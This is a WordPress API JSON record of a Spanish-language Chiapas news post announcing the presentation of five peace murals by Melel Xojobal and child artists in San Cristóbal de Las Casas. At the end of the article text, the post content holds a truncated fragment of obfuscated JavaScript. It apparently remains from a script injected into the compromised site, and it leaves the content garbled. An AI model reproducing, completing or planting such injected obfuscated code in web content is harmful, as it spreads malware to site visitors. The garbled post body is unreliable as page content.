{"id":12959,"date":"2023-11-30T09:59:11","date_gmt":"2023-11-30T09:59:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12959"},"modified":"2023-11-30T09:59:15","modified_gmt":"2023-11-30T09:59:15","slug":"realizara-murales-por-la-paz-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12959","title":{"rendered":"Realizar\u00e1 Murales por la Paz en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"662\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-29-at-4.33.43-PM-662x1024.jpeg\" alt=\"\" class=\"wp-image-12960\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-29-at-4.33.43-PM-662x1024.jpeg 662w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-29-at-4.33.43-PM-194x300.jpeg 194w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-29-at-4.33.43-PM-768x1187.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-29-at-4.33.43-PM-994x1536.jpeg 994w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-29-at-4.33.43-PM.jpeg 1035w\" sizes=\"auto, (max-width: 662px) 100vw, 662px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>29 de Noviembre del 2023. San Crist\u00f3bal de Las Casas.- La Asociaci\u00f3n Civil Melel Xojobal dio a conocer que el pr\u00f3ximo 30 de noviembre realizar\u00e1n la primera presentaci\u00f3n de los murales en Plaza de la Paz (Catedral) y estar\u00e1n situados en la entrada lateral del Museo de San Crist\u00f3bal (Musac) en la calle Guadalupe Victoria.En un escrito, detallan que la actividad empezar\u00e1 a las 4 de la tarde de este jueves y el s\u00e1bado 2 de diciembre har\u00e1n la presentaci\u00f3n oficial en Santo Domingo a partir de las 9:30 de la ma\u00f1ana, justo en la esquina 20 de Noviembre y Escuadr\u00f3n 201.&#8221;Compartiremos artistas, NNATs de Santo Domingo y organizaciones compa\u00f1eras y representantes del Mercado. Tendremos tamalitos y convivio hasta la 1 de la tarde&#8221;, mencionan en el escrito.Asimismo, informan que los Murales por la Paz es una colaboraci\u00f3n entre las y los artistas de la Galer\u00eda De Mi Coraz\u00f3n, Melel Xojobal y NNATs. &#8220;Son 5 murales realizados en loneta que forman un tejido por la paz, resaltando la cultura y origen comunitario, la migraci\u00f3n y el derecho a la movilidad, el trabajo digno y la educaci\u00f3n, el juego y la convivencia entre ni\u00f1as y ni\u00f1os, con estos murales podremos contar historias y desatar reflexiones en calle y distintos espacios urbanos&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 29 de Noviembre del 2023. San Crist\u00f3bal de Las Casas.- La Asociaci\u00f3n Civil Melel Xojobal dio a conocer que el pr\u00f3ximo 30 de noviembre realizar\u00e1n la primera presentaci\u00f3n de los murales en Plaza de la Paz (Catedral) y estar\u00e1n situados en la entrada lateral del Museo de San Crist\u00f3bal (Musac) en la calle &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12960,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12959","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12959","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12959"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12959\/revisions"}],"predecessor-version":[{"id":12961,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12959\/revisions\/12961"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12960"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12959"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12959"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12959"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}